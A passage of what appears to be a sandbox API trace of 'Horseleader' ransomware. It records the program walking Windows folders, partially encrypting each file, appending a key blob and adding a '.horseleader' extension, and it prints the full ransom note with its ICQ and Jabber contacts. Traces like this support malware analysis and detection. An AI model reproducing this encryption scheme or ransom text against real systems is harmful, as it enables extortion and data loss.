pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.horseleader") returned 83 [0245.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\textconv\\wpft532.cnv.horseleader")) returned 1 [0245.875] GetProcessHeap () returned 0x780000 [0245.875] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.875] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 1 [0245.875] lstrcmpiW (lpString1="WPFT632.CNV", lpString2="Windows") returned 1 [0245.875] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0245.875] StrStrIW (lpFirst="WPFT632.CNV", lpSrch=".horseleader") returned 0x0 [0245.875] lstrcmpW (lpString1="WPFT632.CNV", lpString2="#Decrypt#.txt") returned 1 [0245.875] lstrcmpW (lpString1="WPFT632.CNV", lpString2="_uninstalling_.png") returned 1 [0245.876] lstrlenW (lpString=".testttjffg") returned 11 [0245.876] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV", lpSrch=".testttjffg") returned 0x0 [0245.876] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.876] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.876] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0245.877] StrStrW (lpFirst="WPFT632.CNV", lpSrch=".txt") returned 0x0 [0245.877] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=289648) returned 1 [0245.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.877] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.949] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x20db8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.950] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.952] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.952] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.952] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x41b70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.952] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.955] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.956] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.956] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.956] CloseHandle (hObject=0x158) returned 1 [0245.956] GetProcessHeap () returned 0x780000 [0245.956] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.957] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.horseleader") returned 83 [0245.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: 
"c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv.horseleader")) returned 1 [0245.958] GetProcessHeap () returned 0x780000 [0245.958] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.958] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 0 [0245.958] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.958] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\#Decrypt#.txt") returned 73 [0245.958] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.959] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.959] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.961] lstrlenA (lpString="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") returned 1368 [0245.961] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.961] CloseHandle (hObject=0x21c) returned 1 [0245.961] GetProcessHeap () returned 0x780000 [0245.961] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.961] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0245.961] lstrcmpiW (lpString1="THEMES14", lpString2="Windows") returned -1 [0245.962] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned 59 [0245.962] lstrcmpW (lpString1="THEMES14", lpString2=".") returned 1 [0245.962] lstrcmpW (lpString1="THEMES14", lpString2="..") returned 1 [0245.962] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.962] GetProcessHeap () returned 0x780000 [0245.962] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7e1110 [0245.962] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*") returned 61 [0245.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.967] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.967] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\.") returned 61 [0245.967] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.967] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.968] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.968] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\..") returned 62 [0245.968] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.968] lstrcmpW (lpString1="..", lpString2="..") 
returned 0 [0245.968] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0245.968] lstrcmpiW (lpString1="AFTRNOON", lpString2="Windows") returned -1 [0245.969] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 68 [0245.969] lstrcmpW (lpString1="AFTRNOON", lpString2=".") returned 1 [0245.969] lstrcmpW (lpString1="AFTRNOON", lpString2="..") returned 1 [0245.969] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.969] GetProcessHeap () returned 0x780000 [0245.969] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.969] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*") returned 70 [0245.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", 
cAlternateFileName="")) returned 0x7c6760 [0245.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.969] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\.") returned 70 [0245.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.970] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0245.970] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.970] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\..") returned 71 [0245.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.970] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad6ec00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdad6ec00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe58e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AFTRNOON.ELM", cAlternateFileName="")) returned 1 [0245.970] lstrcmpiW (lpString1="AFTRNOON.ELM", lpString2="Windows") returned -1 [0245.970] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned 81 [0245.970] StrStrIW (lpFirst="AFTRNOON.ELM", lpSrch=".horseleader") returned 0x0 [0245.970] lstrcmpW (lpString1="AFTRNOON.ELM", lpString2="#Decrypt#.txt") returned 1 [0245.970] lstrcmpW (lpString1="AFTRNOON.ELM", lpString2="_uninstalling_.png") returned 1 [0245.970] lstrlenW (lpString=".testttjffg") returned 11 [0245.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM", lpSrch=".testttjffg") returned 0x0 [0245.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.977] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned 81 [0245.977] StrStrW (lpFirst="AFTRNOON.ELM", lpSrch=".txt") returned 0x0 [0245.977] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=58766) returned 1 [0245.977] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.983] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.983] WriteFile (in: 
hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.983] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.984] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.984] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0245.985] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x458e, lpOverlapped=0x0) returned 1 [0245.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffba72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x458e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x458e, lpOverlapped=0x0) returned 1 [0245.985] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.985] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.986] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.986] CloseHandle (hObject=0x1a4) returned 1 [0245.986] GetProcessHeap () returned 0x780000 [0245.986] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.986] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.horseleader") returned 93 [0245.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm.horseleader")) returned 1 [0245.987] GetProcessHeap () returned 0x780000 [0245.988] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.988] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AFTRNOON.INF", cAlternateFileName="")) returned 1 [0245.988] lstrcmpiW (lpString1="AFTRNOON.INF", lpString2="Windows") returned -1 [0245.988] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF") returned 81 [0245.988] StrStrIW (lpFirst="AFTRNOON.INF", 
lpSrch=".horseleader") returned 0x0 [0245.988] lstrcmpW (lpString1="AFTRNOON.INF", lpString2="#Decrypt#.txt") returned 1 [0245.988] lstrcmpW (lpString1="AFTRNOON.INF", lpString2="_uninstalling_.png") returned 1 [0245.988] lstrlenW (lpString=".testttjffg") returned 11 [0245.988] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF", lpSrch=".testttjffg") returned 0x0 [0245.988] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.988] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.989] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF") returned 81 [0245.989] StrStrW (lpFirst="AFTRNOON.INF", lpSrch=".txt") returned 0x0 [0245.989] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=555) returned 1 [0245.989] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0245.990] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 